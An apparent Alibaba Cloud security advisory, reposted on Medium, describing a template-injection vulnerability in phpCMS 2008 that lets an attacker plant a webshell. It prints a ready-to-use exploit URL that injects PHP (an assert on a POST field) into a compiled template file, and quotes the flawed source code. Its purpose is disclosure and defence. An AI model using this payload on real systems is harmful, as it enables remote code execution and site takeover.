New Vulnerability Found in the Decade-Old phpCMS 2008 Can Lead to Fresh WebShell Attacks

Vulnerability Details

/type.php?template=tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss

Vulnerability Principles

if(empty($template)) $template = 'type';
...
include template('phpcms', $template);
template_compile($module, $template, $istag);
function template_compile($module, $template, $istag = 0)
{
...
$compiledtplfile = TPL_CACHEPATH.$module.'_'.$template.'.tpl.php';
$content = ($istag || substr($template, 0, 4) == 'tag_') ? '<?php function _tag_'.$module.'_'.$template.'($data, $number, $rows, $count, $page, $pages, $setting){ global $PHPCMS,$MODULE,$M,$CATEGORY,$TYPE,$AREA,$GROUP,$MODEL,$templateid,$_userid,$_username;@extract($setting);?>'.template_parse($content, 1).'<?php } ?>' : template_parse($content);
$strlen = file_put_contents($compiledtplfile, $content);
...
}
tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss

Impact Scope

Security Recommendations

Manual Repair

Security Hardening

  1. Alibaba Cloud Firewall already provides intrusion defenses against this type of vulnerability. You can enable Alibaba Cloud Firewall’s IPS interception mode and virtual patching feature to defend against and intercept attacks that exploit this vulnerability, without having to manually repair it. At the time of writing, Alibaba Cloud Firewall is only available for mainland China accounts. Learn more at https://www.aliyun.com/product/cfw
  2. By purchasing Alibaba Cloud Managed Security Service, you can perform security hardening and optimization with the guidance from Alibaba Cloud security experts, which will protect you against this and other subsequent vulnerabilities.

--

--

--

Follow me to keep abreast with the latest technology news, industry insights, and developer trends. Alibaba Cloud website:https://www.alibabacloud.com

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Privacy Protection in the Digital Marketing Industry.

Cybercoin Staking Guide (CBR)

MetFi Locks $2.5M LP Tokens for 5 Years

DNS Hijack Monitoring

Basic Static Analysis (Part 1)

{UPDATE} Greedy Picks Hack Free Resources Generator

{UPDATE} Maze King Hack Free Resources Generator

Basic_Pentesting_1 VulnHub

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Alibaba Cloud

Alibaba Cloud

Follow me to keep abreast with the latest technology news, industry insights, and developer trends. Alibaba Cloud website:https://www.alibabacloud.com

More from Medium

Securing our internal tools

Add Native WhatsApp Desktop app for Linux

Configure Emails in Wazuh Docker (Docker compose + Outlook SMTP)

Docker client to enable Dynamic DNS with Namecheap